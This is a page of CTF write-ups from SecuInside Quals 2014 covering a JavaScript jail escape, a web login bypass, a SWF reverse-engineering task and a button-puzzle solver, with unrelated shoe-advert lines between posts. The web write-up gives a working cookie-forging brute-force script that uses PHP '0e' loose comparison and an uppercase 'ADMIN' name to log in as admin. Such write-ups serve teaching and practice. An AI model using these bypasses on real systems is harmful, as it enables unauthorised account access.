BalalaikaCr3w - SecuInside CTF Quals 2014

JavaScript jail

villytiger — Mon, 02 Jun 2014 09:14:59 +0000

Category:

Event:

SecuInside CTF Quals 2014

We have an ip address and a port. Connected using netcat we got V8 JavaScript shell. print(Object.keys(this)) gives us all global objects available: print, quit, checker, check.

print(check) gives our pwn target:

function (rand) {
	function stage1() {
		var a = Array.apply(null, new Array(Math.floor(Math.random() * 20) + 10)).map(function () {return Math.random() * 0x10000;});
		var b = rand(a.length);

		if (!Array.isArray(b)) {
			print("You're a cheater!");
			return false;
		}

		if (b.length < a.length) {
			print("hmm.. too short..");
			for (var i = 0, n = a.length - b.length; i < n; i++) {
				delete b[b.length];
				b[b.length] = [Math.random() * 0x10000];
			}
		} else if (b.length > a.length) {
			print("hmm.. too long..");
			for (var i = 0, n = b.length - a.length; i < n; i++)
				Array.prototype.pop.apply(b);
		}

		for (var i = 0, n = b.length; i < n; i++) {
			if (a[i] != b[i]) {
				print("ddang~~");
				return false;
			}
		}

		return true;
	}

	function stage2() {
		var a = Array.apply(null, new Array((myRand() % 20) + 10)).map(function () {return myRand() % 0x10000;});
		var b = rand(a.length);

		if (!Array.isArray(b)) {
			print("You're a cheater!");
			return false;
		}

		if (b.length < a.length) {
			print("hmm.. too short..");
			for (var i = 0, n = a.length - b.length; i < n; i++) {
				delete b[b.length];
				b[b.length] = [Math.random() * 0x10000];
			}
		} else if (b.length > a.length) {
			print("hmm.. too long..");
			for (var i = 0, n = b.length - a.length; i < n; i++)
				Array.prototype.pop.apply(b);
		}

		for (var i = 0, n = b.length; i < n; i++) {
			if (a[i] != b[i]) {
				print("ddang~~");
				return false;
			}
		}

		return true;
	}

	print("stage1");

	if (!stage1())
		return;

	print("stage2");

	if (!stage2())
		return;

	print("awesome!");
	return flag;
}

The flag is contained in closure made by calling checker. Since there is no any legal method to take variables from closure we have to deceive check tests somehow. It's JavaScript baby, we can redefine everything. The simplest solution is to redefine Array.apply in a way it returns empty array and to return empty array from our rand function. Obviously two empty arrays are the same size and have same elements. Let's do it:

Array.apply = function() {return [];};
function rand() {return [];}
check(rand);

This is it.

Sportswear free shipping | Nike Air Force 1'07 Essential blanche et or femme - Chaussures Baskets femme - Gov

Web 200

briskly — Sun, 01 Jun 2014 20:05:07 +0000

Category:

web

Event:

SecuInside CTF Quals 2014

The sense of this task is to login with user which idx=1. But we don't know, who has this idx

The algoritm for cookie is CRCR32 and this is strange. Because this hash purpose is not for crypto, it's for checksums. But for first try code of server look's good enough. REALY THANK TO ORGS, BECAUSE CODE IS GREAT AND SIMPLE, SO IT'S REALY EASY TO UNDERSTAND THE LOGIC OF SERVER

After reading some manuals we decided that the vuln is in hash. And found post about comparison issues in php whith float string

Php is not strongly typed, and that's why there is some magic with comprassions, and one of them is casting both string to float if they look like float. For example:

	if ("0e12" == "0")
		echo 1;
	else
		echo 2;

This code prints 1!!!! This is magic two different string are equal))

So we decided to brute cookie. We were always sending hash = "0" and different timestamp

Some calculation, we need first symbol to be "0", second "e", and all other is digits. So the probability is 1/16 * 1/16 * (10/16)**6. this is equal to 1/4300, that is not much for online brute

First part was done, we could logged-in with id we want. But what id we need?

After reading code we found this strange

public function islogin(){
			if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){
	 			exit("cannot be used Special character");
			}

			if( $_COOKIE['user_name'] == "admin" )	return 0;

			$salt = file_get_contents("../../long_salt.txt");

			if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){
				return 1;
			}

			return 0;
		}

The 6th string seems to be strange, why id admin is restricred. This is easy to bypass. We just need to login with name in uppercase, because php use case sensetive cmp, but sql not.

So the brute scipt is:

import requests

u1 = "http://219.240.37.153:5959/63972dfdacc8a838f618275d80d27c1d_h/index.php"
for i in xrange(0, 10000000):
    print i
    cookies = {
        "login_time": str(i),
        "user_name": "ADMIN",
        "hash": "0"
    }
    try:
        r = requests.get(u1, cookies=cookies).content
    except:
        continue
    if '' not in r:
        print r
        exit(0)

buy footwear | Women's Nike Air Jordan 1 trainers - Latest Releases , Ietp

yayaya

briskly — Sun, 01 Jun 2014 18:31:59 +0000

Category:

reverse

Event:

SecuInside CTF Quals 2014

After decompilation of given SWF file we have found that the code can be divided in two parts. First one is responsible for moving sections of ELF file from SWF's resources to virtual memory. The second one draws black font picture and small colored blocks. The most intresting thing is that position and size of these small colored blocks are defined from ELF binary.

So we get SWF using Crossbridge. So the swf generating the pictures every n milliseconds, but n is always different, and we just need to sum the frames, to get flag

I tried to find programs like swf2png etc. But all of them were trying to get resources, but not to capture the buidling frames.

After that I tried to capture video using the ffmpeg. But after a lot of failed attemps, I just download the programm that makes screen every N millisecons. I ran this programm with flash file and made 4500 of screens. After that I just summed it using PythonImageLibrary and numpy

from PIL import Image
from PIL.Image import fromarray
from numpy import asarray
from os import listdir

images = []

dirname = "screens"
for i, f in enumerate(listdir(dirname)):
    print i
    image = Image.open("%s/%s" % (dirname, f))
    if i == 0:
        dif = asarray(image)
    elif i % 100 == 0:
        fromarray(dif).save("res/file%s.png" % i)
    else:
        dif = dif + asarray(image)
fromarray(dif).save("file6.png")

This script has generated the flag. I think that we get not all frames but it was enough to get flag

P.S. The most funny part was, that one of my teammates ran swf debuger with that file, and forget about it. And after several hours when he switched back swf debugger app, he have seen the lag, where the frames were summed by debbugger. It was worse picture than that, but it was possible to restore flag i think.

Finally, the flag is: GANADAHAAH

Asics footwear | Sneakers

Brain fuzzing

briskly — Sun, 01 Jun 2014 18:08:55 +0000

Category:

ppc

Event:

SecuInside CTF Quals 2014

This kind of famous task. You have board with buttons, wich have 2 positions. In Russia there is old quest game with brother pilots and there was the same task to open the fridge with board 4x4. And there was solution remember all buttons in first position. And switch all this buttons one by one. Repeating this algoritm from 1 to 3 times, you will win.

Also it was kind of this task on phdays quals 2013 (I haven't seen it, but heard about it), and kind of this task on defcon quals 2013, but there was the diffrence. There when you were pushing the button raw and column were reversing but the button you push wasn't

On this ctf there was 4 levels of dificulty of this task. First one is the same a wrote (3 times). Second the same but you need to remeber your steps by yourself(3 times more)

But the most difficult was third part. Orgs have changed the conditions and this time button had 3 positions. That was difficult. After some googling, we found better algorythm for 2 position condition (sorry for russian link). The sense is to build weight matrix. I upgraded it, for more than 2 postions. It was kind of lucky upgrade, I wasn't sure it work. So we build matrix where the cell is (-1)*(sum(raw) + sum(column)) mod N (N=3).

# ar is board transfered to ints [[0,1],[1,0]]
def wMatr(ar, N=3):
    cMax = len(ar[0])
    rMax = len(ar)
    wM = deepcopy(ar)
    for i, raw in enumerate(ar):
        for j, column in enumerate(raw):
            # counting weight for cell, last sub is to remove the dublicate of cell with i,j coords
            wM[i][j] = (sum(raw) + sum(ar[k][j] for k in xrange(rMax)) - ar[i][j]) % N
            # reverse the value cell
            if wM[i][j] != 0:
                wM[i][j] = N - wM[i][j]
    return wM

And after that we push the buttons according to that matrix. After first applying of this algorytm, we get board with the same raws like:

1111
2222
1111
0000

After applying it more than one time, we get the right answer. But that decision is not optimal. And sometimes, it need too many attemps. But it wroked 90% of times.

The last 4th task was kind of boss, it was board with 2 postitions but with size 200x200. There were some problems with connection, so my script sometimes couldn't get the full board. But after over9000 attemps it worked

Full code of the solution:

import re
from socket import create_connection
from copy import deepcopy
from time import sleep

host = "54.198.73.164"
host = "54.81.138.191"
port = 5555
hSock = create_connection((host, port))
ans = hSock.recv(10240)

def invert2(x, y, ar, N=3):
    t = ar[x][y]
    for i in range(len(ar[0])):
        ar[x][i] = (ar[x][i] + 1) % N
    for i in range(len(ar)):
        ar[i][y] = (ar[i][y] + 1) % N
    ar[x][y] = (t+1) % N
    return ar

repl = {
  2: {
    "O": 0,
    "X": 1
  },
  3: {
    "O": 0,
    "W": 1,
    "X": 2
  }
}

def serv():
    for asd in range(10000):
        if asd == 0 or "Lupin hear a sound from safebox" in ans:
            sleep(1)
            ans = hSock.recv(102400)
            print ans
            x, y = map(int, re.findall("Board>\s+(\d+)\s+(\d+)", ans)[0])
            ar = ans.split("\n")[-x-1:-1]
            N = len(set("".join(ar)))
            ar = map(list, ar)
            for i in range(len(ar)):
                for j in range(len(ar[0])):
                    ar[i][j] = repl[N][ar[i][j]]

            mine = deepcopy(ar)
        
        while True:
            sleep(1)
            wM = wMatr(mine, N)
            for i, raw in enumerate(wM):
                for j, column in enumerate(raw):
                    for k in range(column):
                        mine = invert2(i, j, mine, N)
                        hSock.send("%s %s\n" % (i, j));
                        ans = hSock.recv(102400)
                        if len(ans) > 5:
                            print ans
                    #print "\n".join("".join(map((str), c)) for c in mine), "\n"
            if "Lupin hear a sound from safebox. some layout of button changed" in ans:
                break
            if "Too many attempts" in ans:
                exit(0)
            if set("".join("".join(map((str), c)) for c in mine)) == set(["0"]):
                break

    print hSock.recv(10240)

def wMatr(ar, N=3):
    cMax = len(ar[0])
    rMax = len(ar)
    wM = deepcopy(ar)
    for i, raw in enumerate(ar):
        for j, column in enumerate(raw):
            wM[i][j] = (sum(raw) + sum(ar[k][j] for k in xrange(rMax)) - ar[i][j]) % N
            if wM[i][j] != 0:
                wM[i][j] = N - wM[i][j]
    return wM

serv()

Finally we receive message with flag:

Lupin hear a sound from safebox. some layout of button changed

There is a beep sound from safebox. we might be on the right way.
Some strange noise come out from the safebox..
                        '
               '        '        '
       '         '      '      '        '
          '        \    '    /       '
              ' .   .-"```"-.  . '
                    \`-._.-`/   
         - -  =      \\ | //      =  -  -
                    ' \\|// '   
              . '      \|/     ' .
           .         '  `  '         .
        .          /    .    \           .
                 .      .      .


Congrats!!!! Lupin finally got the Cherry Saphhire!!
Right behind of the jewel, Lupin found a short memo
-----------------------------------------------------
The flag is "THE BEST people are always TAKEN, if you don't STEAL them, you won't HAVE them" (without quote)

So, THE BEST people are always TAKEN, if you don't STEAL them, you won't HAVE them

Running Sneakers | Buy online Sneaker for Men